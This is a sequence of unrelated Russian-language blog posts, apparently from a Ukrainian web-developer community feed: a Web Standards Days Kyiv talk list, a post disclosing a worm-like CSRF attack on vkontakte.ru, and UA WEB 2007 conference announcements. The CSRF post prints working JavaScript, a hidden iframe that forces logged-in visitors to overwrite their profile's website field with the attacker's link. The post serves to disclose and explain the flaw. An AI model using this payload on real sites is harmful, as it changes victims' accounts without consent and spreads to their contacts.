Не прошло и десяти дней, как мы публикуем официальный отчёт о встрече Web Standards Days, прошедшей в Киеве 18-го сентября. Как это обычно случается, финальная программа сильно отличалась от заявленной ранее — но только в сторону её улучшения. На встрече прозвучало шесть докладов:

• Веб-стандарты в большом проекте: что помогает, а что мешает. Андрей Сумин, PDF 138 КБ;
• Про проектирование интерфейсов и немного про Adobe Fireworks. Вадим Пацев, PDF 1,2 МБ;
• Веб в кривых. Второе рождение SVG. Вадим Макеев, HTML 15,6 МБ;
• Введение в Web Performance: W3C, Webkit, IE9 и будущее. Николай Мациевский, PDF 4,1 МБ;
• Разработка веб-приложений. Обзорная экскурсия. Виталий Рыбалка;
• Обзор новых API JavaScript. HTML5 и самостоятельные черновики W3C. Антон Немцев, HTML 750 КБ.

…причём порядок их следования составлялся налету, по мере появления докладчиков, что добавило некоторой динамики и неожиданности в нашу и без того нескучную программу.

Обнаружил забавную атаку на сайт vkontakte.ru.
При переходе на сайт tvoydohod.com, если вы в этот же момент авторизованы на вконтакте, отработает следующий джаваскрипт:

<script>
function doit() {
  var html;
  html = '<img src=http://vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com>';
  window.frames["frm"].document.body.innerHTML = html;
}
</script>
<iframe name="frm" onload="doit()" width="0" height="0"></iframe>

Как видно, будет запрошена картинка с адресом vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com, броузер сделает запрос по этому УРЛу, и на анкете в vkontakte ваше поле «Веб-сайт» станет равным tvoydohod.com.
Затем в вашем профайле, ваш друг, который вам доверяет кликнет на этот линк, и изменит профайл себе… И т д.

Этот вид атак называется Cross Site Request Forgery. В вики описаны все противоядия и куча полезной инфы.

Сам по себе CSRF довольно скучен. Но в данном случае забавно то, что каждый заразившийся становится разносчиком CSRF-линка.

Отписал в тех-поддержку, где столкнулся с «Это не баг!», «Не кликайте по подозрительным ссылкам!» и прочим. Надеюсь пользователей они ценят и поправят.
А вам было интересно узнать о таком простом «вирусе», который живет целиком в соц-сети =)

Даты и место проведения конференции веб-разработчиков Украины теперь точно известны: UA WEB 2007 состоится 29-30 октября, в конференц зале Президент Отеля, Киев.

Так же публикуем предварительный список докладов и докладчиков, разбитый на три секции — «Клиентские технологии», «Cерверное программирование» и «Бизнес, фриланс, аутсорсинг».

Дамы и господа, коллеги!

27 июня, в Киеве, вечером в 19:00 (время киевское) состоится первое собрание докладчиков первой украинской конференции веб-разработчиков UA Web — 2007 ;)

Ждем всех желающих сделать доклады, а также сомневающихся, сочувствующих и тех, кому не все равно. Задачи на вечер:
Познакомиться;
Поделиться общей информацией о конференции (языки, состав, цель);
Обсудить потенциальную программу — о чем нам было бы интересно поговорить друг с другом;
Решить вопросы по продолжительности докладов;
Обсудить имеющийся опыт, как не повторить ошибок;
Выбрать ответственных за каждую секцию;
Установить самим себе крайние даты подачи тезисов докладов;
Сформировать план дальнейших действий.